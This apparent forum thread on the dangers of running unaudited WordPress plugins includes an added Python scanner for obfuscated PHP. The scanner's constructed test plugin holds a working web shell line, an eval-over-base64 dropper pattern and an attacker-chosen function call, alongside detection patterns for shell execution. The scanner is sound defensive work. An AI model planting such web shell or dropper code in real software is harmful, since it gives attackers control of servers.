by jmnicolas 1612 days ago
That's what's worrying about running WordPress plugins: you mean I'm downloading some PHP code written by somebody unknown, and this code executes whatever it wants on my server???!!!

It seems I'm the only one that is bothered by this.

And no, I don't have the time nor the skill to audit everything or to use a static site generator like Hugo.

2 comments

What is the difference between downloading a WordPress plugin and running it on your server, and downloading a jar from Maven or a JS package from npm and running it?
Nothing. These are also very, very dangerous and expose your site to supply-chain attacks.

The article linked here [0] is a must-read for everyone who feels that adding a dependency is safe.

[0] https://medium.com/hackernoon/im-harvesting-credit-card-numb...

I work with C#, and most (all?) NuGet packages I download are open source, which isn't the case for a lot of WP plugins, which are obfuscated.

They're also centrally managed by Microsoft, so if there were a problem with one package they could kick it out of the NuGet repo.

But in the end you're right, it's mostly a matter of trust and fingers crossed.
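Since the comment above contrasts open-source NuGet packages with obfuscated WP plugins, here is an added example (not code from the thread or from any plugin it mentions) of the kind of check a practitioner runs before installing a plugin: a heuristic scan of PHP files for the patterns obfuscated droppers and web shells typically use, such as eval() over base64_decode()/gzinflate() output, long opaque string literals, variable-variable function calls and shell execution. The two sample "plugins" embedded in the block are constructed for the demonstration; the indicator list is an assumption about what is worth flagging, not an exhaustive or authoritative signature set.

```python
"""Heuristic scan of PHP plugin files for obfuscation and remote-code-execution patterns."""
from __future__ import annotations

import re
import sys
from pathlib import Path

# Each indicator: (compiled regex, short description). These are heuristics a
# reviewer would grep for before installing a plugin, not proof of malice:
# legitimate code (backup tools, template engines) can trip some of them.
INDICATORS = [
    (re.compile(r"\beval\s*\("), "eval() call"),
    (re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("), "decode/inflate call"),
    (re.compile(r"\bcreate_function\s*\("), "create_function() runtime code generation"),
    (re.compile(r"\bpreg_replace\s*\(\s*['\"][^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]"), "preg_replace with /e modifier"),
    (re.compile(r"['\"][A-Za-z0-9+/=]{120,}['\"]"), "long base64-looking string literal"),
    (re.compile(r"\$\{?\$\w+\}?\s*\("), "variable-variable function call"),
    (re.compile(r"\b(shell_exec|passthru|system|proc_open|popen|exec)\s*\("), "shell/process execution"),
]


def scan_source(source: str, name: str = "<string>") -> list[tuple[str, int, str, str]]:
    """Return (file, line_no, description, stripped line) for each indicator hit.

    One finding per (line, indicator): a line calling both eval() and
    base64_decode() yields two findings, which is the usual dropper shape.
    """
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for pattern, description in INDICATORS:
            if pattern.search(line):
                findings.append((name, line_no, description, line.strip()))
    return findings


def scan_tree(root: Path) -> list[tuple[str, int, str, str]]:
    """Scan every *.php file under root (for example wp-content/plugins)."""
    findings = []
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        findings.extend(scan_source(text, str(path.relative_to(root))))
    return findings


def summarize(findings) -> dict[str, int]:
    """Count findings per indicator description."""
    counts: dict[str, int] = {}
    for _, _, description, _ in findings:
        counts[description] = counts.get(description, 0) + 1
    return counts


# Constructed sample inputs (not real plugins): one harmless, one dropper-shaped.
BENIGN_PLUGIN = """<?php
/*
Plugin Name: Hello Example
*/
add_action('wp_footer', function () {
    echo '<p>Hello from a plugin.</p>';
});
"""

SUSPICIOUS_PLUGIN = (
    "<?php\n"
    "/*\n"
    "Plugin Name: Totally Legit SEO\n"
    "*/\n"
    '$payload = "' + "QUFB" * 40 + '";\n'                 # line 5: long opaque literal
    "eval(gzinflate(base64_decode($payload)));\n"         # line 6: classic dropper shape
    "if (isset($_GET['c'])) { @system($_GET['c']); }\n"  # line 7: web shell
    "$fn = $_POST['f'];\n"
    "$$fn($_POST['a']);\n"                                # line 9: attacker-chosen function
)


if __name__ == "__main__":
    # Usage: python scan_plugins.py /path/to/wp-content/plugins
    # Without an argument the constructed suspicious sample is scanned instead.
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    results = scan_tree(target) if target else scan_source(SUSPICIOUS_PLUGIN, "sample.php")
    for file, line_no, description, snippet in results:
        print(f"{file}:{line_no}: {description}: {snippet}")
    print("summary:", summarize(results))
```

A clean scan does not make a plugin safe (a plugin can fetch its payload at runtime, or simply be honest PHP that does something harmful), but a hit on the eval-plus-decode shape or a variable-variable call fed from request parameters is reason enough to read the file before enabling it.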

Isn't that what WordPress is in the first place?
Absolutely, but it's still scary nonetheless! The problem is that there aren't many viable alternatives to WP.
Isn't any piece of software "some <lang> code written by somebody unknown and this code executes whatever it wants on your server"?